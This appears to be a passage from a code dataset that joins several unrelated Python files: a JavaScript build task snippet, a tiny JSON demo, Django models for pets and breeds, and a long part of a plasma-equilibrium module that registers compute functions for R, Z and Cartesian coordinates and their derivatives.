    easy.call_task('increment_version')
    easy.call_task('get_js')
    easy.call_task('minify')
    easy.call_task('uglify')
    easy.call_task('concat')
    print get_version()
@easy.task
def minify():
    """Run jsmin over every collected (name, source) pair in place."""
    options.assets.js_files = map(lambda x: ((x[0],jsmin(x[1]))),options.assets.js_files)
@easy.task
def uglify():
for fle,data in options.assets.js_files:
try:
options.assets.js_files[options.assets.js_files.index((fle,data))] = (fle,uglify(data))
except:
print fle
#options.assets.js_files = map(compile,options.assets.js_files)
@easy.task
def concat():
    """Join all collected js sources into the single options.assets.js string."""
    options.assets.js = ''.join(map(lambda x: str(x[1]),options.assets.js_files))
|
19,252 | 8f290cf358c044fa6b4fad1789410acddc77af6c | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 18:51:34 2018
@author: Amanda
"""
import json
# Demo: serialise a dict to a JSON string and parse it back.
estoque = {'chuchu':2, 'abacaxi':3}
estoquestr= json.dumps(estoque)
estoque = json.loads(estoquestr)
# A JSON string is indexable like any str: prints its sixth character.
print(estoquestr[5])
print(estoque)
print(estoque['chuchu'])
19,253 | 8d435c89642ba052eda3fbed27e747c4639bff17 | from django.db import models
# Create your models here.
class tipos(models.Model):
    """Pet-type catalogue entry (lowercase name kept: existing migrations
    and FKs reference it)."""
    id=models.AutoField(primary_key=True)
    codigo=models.CharField(max_length=80, )
    nombre=models.CharField(max_length=180 , )
    abreviatura=models.CharField(max_length=80)
    estado=models.BooleanField()
    # NOTE(review): no auto_now/auto_now_add — timestamps must be supplied
    # by the caller; confirm this is intended.
    fecha_creacion=models.DateTimeField()
    fecha_modificacion=models.DateTimeField()
class razas(models.Model):
    """Breed catalogue entry, belonging to a pet type (tipos)."""
    id=models.AutoField(primary_key=True)
    codigo=models.CharField(max_length=80,)
    nombre=models.CharField(max_length=180 ,)
    abreviatura=models.CharField(max_length=80)
    id_tipo=models.ForeignKey(tipos, on_delete=models.CASCADE)
    estado=models.BooleanField()
    # NOTE(review): timestamps are caller-supplied (no auto_now options).
    fecha_creacion=models.DateTimeField()
    fecha_modificacion=models.DateTimeField()
class mascotas(models.Model):
    """A pet: references both its type and its breed.

    NOTE(review): id_tipo duplicates information reachable via
    id_raza.id_tipo — confirm the denormalisation is intended.
    """
    id=models.AutoField(primary_key=True)
    codigo=models.CharField(max_length=80, )
    id_tipo=models.ForeignKey(tipos, on_delete=models.CASCADE)
    id_raza=models.ForeignKey(razas, on_delete=models.CASCADE)
    nombre=models.CharField(max_length=180)
    tiene_vacunas=models.BooleanField()
    estado=models.BooleanField()
    # NOTE(review): timestamps are caller-supplied (no auto_now options).
    fecha_creacion=models.DateTimeField()
    fecha_modificacion=models.DateTimeField()
19,254 | 02e9a8c8b9f9908ccdd9729530092644771a7f2d | """Core compute functions, for polar, flux, and cartesian coordinates."""
from desc.backend import jnp
from .data_index import register_compute_fun
@register_compute_fun(
    name="0",
    label="0",
    units="~",
    units_long="None",
    description="Zeros",
    dim=1,
    params=[],
    transforms={"grid": []},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _0(params, transforms, profiles, data, **kwargs):
    # Constant zero field: one value per grid node.
    data["0"] = jnp.zeros(transforms["grid"].num_nodes)
    return data
@register_compute_fun(
    name="R",
    label="R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R(params, transforms, profiles, data, **kwargs):
    # Spectral -> real-space transform of R, no derivatives (orders 0,0,0).
    data["R"] = transforms["R"].transform(params["R_lmn"], 0, 0, 0)
    return data
@register_compute_fun(
    name="R_r",
    label="\\partial_{\\rho} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, first radial derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_r(params, transforms, profiles, data, **kwargs):
    # dR/drho: derivative orders (1, 0, 0) of the spectral transform.
    data["R_r"] = transforms["R"].transform(params["R_lmn"], 1, 0, 0)
    return data
@register_compute_fun(
    name="R_rr",
    label="\\partial_{\\rho \\rho} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, second radial derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[2, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rr(params, transforms, profiles, data, **kwargs):
    # d^2R/drho^2: derivative orders (2, 0, 0) of the spectral transform.
    data["R_rr"] = transforms["R"].transform(params["R_lmn"], 2, 0, 0)
    return data
@register_compute_fun(
    name="R_rrr",
    # Bug fix: the label began "\rho" in a non-raw string, embedding a
    # literal carriage-return escape; corrected to "\\rho" like the other
    # entries in this file.
    label="\\partial_{\\rho \\rho \\rho} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third radial derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[3, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrr(params, transforms, profiles, data, **kwargs):
    # d^3R/drho^3: derivative orders (3, 0, 0) of the spectral transform.
    data["R_rrr"] = transforms["R"].transform(params["R_lmn"], 3, 0, 0)
    return data
@register_compute_fun(
    name="R_rrrr",
    # Bug fix: the label began "\rho" in a non-raw string (a literal
    # carriage-return escape); corrected to "\\rho".
    label="\\partial_{\\rho \\rho \\rho \\rho} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth radial derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[4, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrrr(params, transforms, profiles, data, **kwargs):
    # d^4R/drho^4: derivative orders (4, 0, 0) of the spectral transform.
    data["R_rrrr"] = transforms["R"].transform(params["R_lmn"], 4, 0, 0)
    return data
@register_compute_fun(
    name="R_rrrt",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho \\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative wrt"
    " radial coordinate thrice and poloidal once",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[3, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrrt(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: three radial, one poloidal."""
    data["R_rrrt"] = transforms["R"].transform(params["R_lmn"], 3, 1, 0)
    return data
@register_compute_fun(
    name="R_rrrz",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative wrt"
    " radial coordinate thrice and toroidal once",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[3, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrrz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: three radial, one toroidal."""
    data["R_rrrz"] = transforms["R"].transform(params["R_lmn"], 3, 0, 1)
    return data
@register_compute_fun(
    name="R_rrt",
    label="\\partial_{\\rho \\rho \\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third derivative, wrt radius twice "
    "and poloidal angle",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[2, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrt(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of R: two radial, one poloidal."""
    deriv = transforms["R"].transform(params["R_lmn"], 2, 1, 0)
    data["R_rrt"] = deriv
    return data
@register_compute_fun(
    name="R_rrtt",
    label="\\partial_{\\rho \\rho \\theta \\theta} R",
    units="m",
    units_long="meters",
    # fix: typo "fouth" -> "fourth"
    description="Major radius in lab frame, fourth derivative, wrt radius twice "
    "and poloidal angle twice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[2, 2, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrtt(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: two radial, two poloidal."""
    data["R_rrtt"] = transforms["R"].transform(params["R_lmn"], 2, 2, 0)
    return data
@register_compute_fun(
    name="R_rrtz",
    label="\\partial_{\\rho \\rho \\theta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative wrt radius twice,"
    " poloidal angle, and toroidal angle",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[2, 1, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrtz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: two radial, one poloidal, one toroidal."""
    coeffs = params["R_lmn"]
    data["R_rrtz"] = transforms["R"].transform(coeffs, 2, 1, 1)
    return data
@register_compute_fun(
    name="R_rrz",
    label="\\partial_{\\rho \\rho \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third derivative, wrt radius twice "
    "and toroidal angle",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[2, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of R: two radial, one toroidal."""
    deriv = transforms["R"].transform(params["R_lmn"], 2, 0, 1)
    data["R_rrz"] = deriv
    return data
@register_compute_fun(
    name="R_rrzz",
    label="\\partial_{\\rho \\rho \\zeta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative, wrt radius twice "
    "and toroidal angle twice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[2, 0, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rrzz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: two radial, two toroidal."""
    coeffs = params["R_lmn"]
    data["R_rrzz"] = transforms["R"].transform(coeffs, 2, 0, 2)
    return data
@register_compute_fun(
    name="R_rt",
    label="\\partial_{\\rho \\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, second derivative wrt radius "
    "and poloidal angle",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rt(params, transforms, profiles, data, **kwargs):
    """Mixed second derivative of R wrt rho and theta."""
    deriv = transforms["R"].transform(params["R_lmn"], 1, 1, 0)
    data["R_rt"] = deriv
    return data
@register_compute_fun(
    name="R_rtt",
    label="\\partial_{\\rho \\theta \\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third derivative wrt radius and "
    "poloidal angle twice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 2, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rtt(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of R: one radial, two poloidal."""
    coeffs = params["R_lmn"]
    data["R_rtt"] = transforms["R"].transform(coeffs, 1, 2, 0)
    return data
@register_compute_fun(
    name="R_rttt",
    label="\\partial_{\\rho \\theta \\theta \\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative wrt radius and "
    "poloidal angle thrice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 3, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rttt(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: one radial, three poloidal."""
    deriv = transforms["R"].transform(params["R_lmn"], 1, 3, 0)
    data["R_rttt"] = deriv
    return data
@register_compute_fun(
    name="R_rttz",
    label="\\partial_{\\rho \\theta \\theta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative wrt radius once, "
    "poloidal angle twice, and toroidal angle once",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 2, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rttz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: one radial, two poloidal, one toroidal."""
    coeffs = params["R_lmn"]
    data["R_rttz"] = transforms["R"].transform(coeffs, 1, 2, 1)
    return data
@register_compute_fun(
    name="R_rtz",
    label="\\partial_{\\rho \\theta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third derivative wrt radius, poloidal "
    "angle, and toroidal angle",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 1, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rtz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of R: one radial, one poloidal, one toroidal."""
    deriv = transforms["R"].transform(params["R_lmn"], 1, 1, 1)
    data["R_rtz"] = deriv
    return data
@register_compute_fun(
    name="R_rtzz",
    label="\\partial_{\\rho \\theta \\zeta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative wrt radius, poloidal "
    "angle, and toroidal angle twice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 1, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rtzz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: one radial, one poloidal, two toroidal."""
    coeffs = params["R_lmn"]
    data["R_rtzz"] = transforms["R"].transform(coeffs, 1, 1, 2)
    return data
@register_compute_fun(
    name="R_rz",
    label="\\partial_{\\rho \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, second derivative wrt radius "
    "and toroidal angle",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rz(params, transforms, profiles, data, **kwargs):
    """Mixed second derivative of R wrt rho and zeta."""
    deriv = transforms["R"].transform(params["R_lmn"], 1, 0, 1)
    data["R_rz"] = deriv
    return data
@register_compute_fun(
    name="R_rzz",
    label="\\partial_{\\rho \\zeta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third derivative wrt radius and "
    "toroidal angle twice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 0, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rzz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of R: one radial, two toroidal."""
    coeffs = params["R_lmn"]
    data["R_rzz"] = transforms["R"].transform(coeffs, 1, 0, 2)
    return data
@register_compute_fun(
    name="R_rzzz",
    label="\\partial_{\\rho \\zeta \\zeta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, fourth derivative wrt radius and "
    "toroidal angle thrice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[1, 0, 3]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_rzzz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of R: one radial, three toroidal."""
    deriv = transforms["R"].transform(params["R_lmn"], 1, 0, 3)
    data["R_rzzz"] = deriv
    return data
@register_compute_fun(
    name="R_t",
    label="\\partial_{\\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, first poloidal derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_t(params, transforms, profiles, data, **kwargs):
    """First poloidal derivative of the major radius R."""
    coeffs = params["R_lmn"]
    data["R_t"] = transforms["R"].transform(coeffs, 0, 1, 0)
    return data
@register_compute_fun(
    name="R_tt",
    label="\\partial_{\\theta \\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, second poloidal derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 2, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_tt(params, transforms, profiles, data, **kwargs):
    """Second poloidal derivative of the major radius R."""
    deriv = transforms["R"].transform(params["R_lmn"], 0, 2, 0)
    data["R_tt"] = deriv
    return data
@register_compute_fun(
    name="R_ttt",
    label="\\partial_{\\theta \\theta \\theta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third poloidal derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 3, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_ttt(params, transforms, profiles, data, **kwargs):
    """Third poloidal derivative of the major radius R."""
    coeffs = params["R_lmn"]
    data["R_ttt"] = transforms["R"].transform(coeffs, 0, 3, 0)
    return data
@register_compute_fun(
    name="R_ttz",
    label="\\partial_{\\theta \\theta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third derivative wrt poloidal angle "
    "twice and toroidal angle",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 2, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_ttz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of R: two poloidal, one toroidal."""
    deriv = transforms["R"].transform(params["R_lmn"], 0, 2, 1)
    data["R_ttz"] = deriv
    return data
@register_compute_fun(
    name="R_tz",
    label="\\partial_{\\theta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, second derivative wrt poloidal "
    "and toroidal angles",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 1, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_tz(params, transforms, profiles, data, **kwargs):
    """Mixed second derivative of R wrt theta and zeta."""
    coeffs = params["R_lmn"]
    data["R_tz"] = transforms["R"].transform(coeffs, 0, 1, 1)
    return data
@register_compute_fun(
    name="R_tzz",
    label="\\partial_{\\theta \\zeta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third derivative wrt poloidal angle "
    "and toroidal angle twice",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 1, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_tzz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of R: one poloidal, two toroidal."""
    deriv = transforms["R"].transform(params["R_lmn"], 0, 1, 2)
    data["R_tzz"] = deriv
    return data
@register_compute_fun(
    name="R_z",
    label="\\partial_{\\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, first toroidal derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_z(params, transforms, profiles, data, **kwargs):
    """First toroidal derivative of the major radius R."""
    coeffs = params["R_lmn"]
    data["R_z"] = transforms["R"].transform(coeffs, 0, 0, 1)
    return data
@register_compute_fun(
    name="R_zz",
    label="\\partial_{\\zeta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, second toroidal derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 0, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_zz(params, transforms, profiles, data, **kwargs):
    """Second toroidal derivative of the major radius R."""
    deriv = transforms["R"].transform(params["R_lmn"], 0, 0, 2)
    data["R_zz"] = deriv
    return data
@register_compute_fun(
    name="R_zzz",
    label="\\partial_{\\zeta \\zeta \\zeta} R",
    units="m",
    units_long="meters",
    description="Major radius in lab frame, third toroidal derivative",
    dim=1,
    params=["R_lmn"],
    transforms={"R": [[0, 0, 3]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _R_zzz(params, transforms, profiles, data, **kwargs):
    """Third toroidal derivative of the major radius R."""
    coeffs = params["R_lmn"]
    data["R_zzz"] = transforms["R"].transform(coeffs, 0, 0, 3)
    return data
@register_compute_fun(
    name="X",
    label="X = R \\cos{\\phi}",
    units="m",
    units_long="meters",
    description="Cartesian X coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "phi"],
)
def _X(params, transforms, profiles, data, **kwargs):
    """Cartesian X coordinate: X = R * cos(phi)."""
    cos_phi = jnp.cos(data["phi"])
    data["X"] = data["R"] * cos_phi
    return data
@register_compute_fun(
    name="X_r",
    label="\\partial_{\\rho} X",
    units="m",
    units_long="meters",
    description="Cartesian X coordinate, derivative wrt radial coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "R_r", "phi", "phi_r"],
)
def _X_r(params, transforms, profiles, data, **kwargs):
    """Radial derivative of X = R cos(phi) by the product/chain rule."""
    cos_phi = jnp.cos(data["phi"])
    sin_phi = jnp.sin(data["phi"])
    data["X_r"] = data["R_r"] * cos_phi - data["R"] * sin_phi * data["phi_r"]
    return data
@register_compute_fun(
    name="X_t",
    label="\\partial_{\\theta} X",
    units="m",
    units_long="meters",
    description="Cartesian X coordinate, derivative wrt poloidal coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "R_t", "phi", "phi_t"],
)
def _X_t(params, transforms, profiles, data, **kwargs):
    """Poloidal derivative of X = R cos(phi) by the product/chain rule."""
    cos_phi = jnp.cos(data["phi"])
    sin_phi = jnp.sin(data["phi"])
    data["X_t"] = data["R_t"] * cos_phi - data["R"] * sin_phi * data["phi_t"]
    return data
@register_compute_fun(
    name="X_z",
    label="\\partial_{\\zeta} X",
    units="m",
    units_long="meters",
    description="Cartesian X coordinate, derivative wrt toroidal coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "R_z", "phi", "phi_z"],
)
def _X_z(params, transforms, profiles, data, **kwargs):
    """Toroidal derivative of X = R cos(phi) by the product/chain rule."""
    cos_phi = jnp.cos(data["phi"])
    sin_phi = jnp.sin(data["phi"])
    data["X_z"] = data["R_z"] * cos_phi - data["R"] * sin_phi * data["phi_z"]
    return data
@register_compute_fun(
    name="Y",
    label="Y = R \\sin{\\phi}",
    units="m",
    units_long="meters",
    description="Cartesian Y coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "phi"],
)
def _Y(params, transforms, profiles, data, **kwargs):
    """Cartesian Y coordinate: Y = R * sin(phi)."""
    sin_phi = jnp.sin(data["phi"])
    data["Y"] = data["R"] * sin_phi
    return data
@register_compute_fun(
    name="Y_r",
    label="\\partial_{\\rho} Y",
    units="m",
    units_long="meters",
    description="Cartesian Y coordinate, derivative wrt radial coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "R_r", "phi", "phi_r"],
)
def _Y_r(params, transforms, profiles, data, **kwargs):
    """Radial derivative of Y = R sin(phi) by the product/chain rule."""
    cos_phi = jnp.cos(data["phi"])
    sin_phi = jnp.sin(data["phi"])
    data["Y_r"] = data["R_r"] * sin_phi + data["R"] * cos_phi * data["phi_r"]
    return data
@register_compute_fun(
    name="Y_t",
    label="\\partial_{\\theta} Y",
    units="m",
    units_long="meters",
    description="Cartesian Y coordinate, derivative wrt poloidal coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "R_t", "phi", "phi_t"],
)
def _Y_t(params, transforms, profiles, data, **kwargs):
    """Poloidal derivative of Y = R sin(phi) by the product/chain rule."""
    cos_phi = jnp.cos(data["phi"])
    sin_phi = jnp.sin(data["phi"])
    data["Y_t"] = data["R_t"] * sin_phi + data["R"] * cos_phi * data["phi_t"]
    return data
@register_compute_fun(
    name="Y_z",
    label="\\partial_{\\zeta} Y",
    units="m",
    units_long="meters",
    description="Cartesian Y coordinate, derivative wrt toroidal coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["R", "R_z", "phi", "phi_z"],
)
def _Y_z(params, transforms, profiles, data, **kwargs):
    """Toroidal derivative of Y = R sin(phi) by the product/chain rule."""
    cos_phi = jnp.cos(data["phi"])
    sin_phi = jnp.sin(data["phi"])
    data["Y_z"] = data["R_z"] * sin_phi + data["R"] * cos_phi * data["phi_z"]
    return data
@register_compute_fun(
    name="Z",
    label="Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z(params, transforms, profiles, data, **kwargs):
    """Evaluate the vertical coordinate Z on the grid from its spectral coefficients."""
    coeffs = params["Z_lmn"]
    data["Z"] = transforms["Z"].transform(coeffs, 0, 0, 0)
    return data
@register_compute_fun(
    name="Z_r",
    label="\\partial_{\\rho} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, first radial derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_r(params, transforms, profiles, data, **kwargs):
    """First radial derivative of the vertical coordinate Z."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 1, 0, 0)
    data["Z_r"] = deriv
    return data
@register_compute_fun(
    name="Z_rr",
    label="\\partial_{\\rho \\rho} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, second radial derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[2, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rr(params, transforms, profiles, data, **kwargs):
    """Second radial derivative of the vertical coordinate Z."""
    coeffs = params["Z_lmn"]
    data["Z_rr"] = transforms["Z"].transform(coeffs, 2, 0, 0)
    return data
@register_compute_fun(
    name="Z_rrr",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third radial derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[3, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrr(params, transforms, profiles, data, **kwargs):
    """Third radial derivative of the vertical coordinate Z."""
    data["Z_rrr"] = transforms["Z"].transform(params["Z_lmn"], 3, 0, 0)
    return data
@register_compute_fun(
    name="Z_rrrr",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho \\rho} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, fourth radial derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[4, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrrr(params, transforms, profiles, data, **kwargs):
    """Fourth radial derivative of the vertical coordinate Z."""
    data["Z_rrrr"] = transforms["Z"].transform(params["Z_lmn"], 4, 0, 0)
    return data
@register_compute_fun(
    name="Z_rrrt",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho \\theta} Z",
    units="m",
    units_long="meters",
    # fix: removed doubled space at the string-concatenation boundary
    description="Vertical coordinate in lab frame, fourth derivative wrt "
    "radial coordinate thrice and poloidal once",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[3, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrrt(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: three radial, one poloidal."""
    data["Z_rrrt"] = transforms["Z"].transform(params["Z_lmn"], 3, 1, 0)
    return data
@register_compute_fun(
    name="Z_rrrz",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho \\zeta} Z",
    units="m",
    units_long="meters",
    # fix: removed doubled space at the string-concatenation boundary
    description="Vertical coordinate in lab frame, fourth derivative wrt "
    "radial coordinate thrice and toroidal once",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[3, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrrz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: three radial, one toroidal."""
    data["Z_rrrz"] = transforms["Z"].transform(params["Z_lmn"], 3, 0, 1)
    return data
@register_compute_fun(
    name="Z_rrt",
    label="\\partial_{\\rho \\rho \\theta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third derivative, wrt radius "
    "twice and poloidal angle",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[2, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrt(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of Z: two radial, one poloidal."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 2, 1, 0)
    data["Z_rrt"] = deriv
    return data
@register_compute_fun(
    name="Z_rrtt",
    # fix: label was missing the second \\theta (it is a d^4 Z / drho^2 dtheta^2)
    label="\\partial_{\\rho \\rho \\theta \\theta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, fourth derivative, wrt radius "
    "twice and poloidal angle twice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[2, 2, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrtt(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: two radial, two poloidal."""
    data["Z_rrtt"] = transforms["Z"].transform(params["Z_lmn"], 2, 2, 0)
    return data
@register_compute_fun(
    name="Z_rrtz",
    label="\\partial_{\\rho \\rho \\theta \\zeta} Z",
    units="m",
    units_long="meters",
    # fix: missing space at the concatenation boundary rendered as "radiustwice"
    description="Vertical coordinate in lab frame, fourth derivative wrt radius "
    "twice, poloidal angle, and toroidal angle",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[2, 1, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrtz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: two radial, one poloidal, one toroidal."""
    data["Z_rrtz"] = transforms["Z"].transform(params["Z_lmn"], 2, 1, 1)
    return data
@register_compute_fun(
    name="Z_rrz",
    label="\\partial_{\\rho \\rho \\zeta} Z",
    units="m",
